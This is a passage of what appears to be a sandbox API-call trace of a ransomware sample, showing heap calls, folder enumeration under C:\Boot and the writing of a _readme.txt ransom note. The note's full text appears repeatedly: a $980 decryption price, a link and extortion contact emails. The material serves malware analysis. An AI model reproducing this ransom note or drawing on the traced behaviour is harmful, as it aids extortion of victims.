(HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.876] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0090.876] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.876] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.876] PathFindFileNameW (pszPath="") returned="" [0090.876] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.877] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.877] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.877] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.877] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0090.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.877] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0090.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.877] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.877] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.878] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.878] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.878] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.878] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.878] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.878] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.878] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.879] CloseHandle (hObject=0x5cc) returned 1 [0090.880] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.880] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.880] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.880] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.880] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.880] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.880] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.880] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.880] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.880] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa33beb00, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.880] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa33beb00, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa33beb00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33beb00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.881] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.881] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.881] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.881] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.882] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.882] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.882] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.882] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.882] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0090.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.882] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.882] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.882] PathFindFileNameW (pszPath="") returned="" [0090.882] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.882] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.883] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.883] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0090.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.883] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.883] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0090.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.883] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.883] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0090.884] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.884] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is 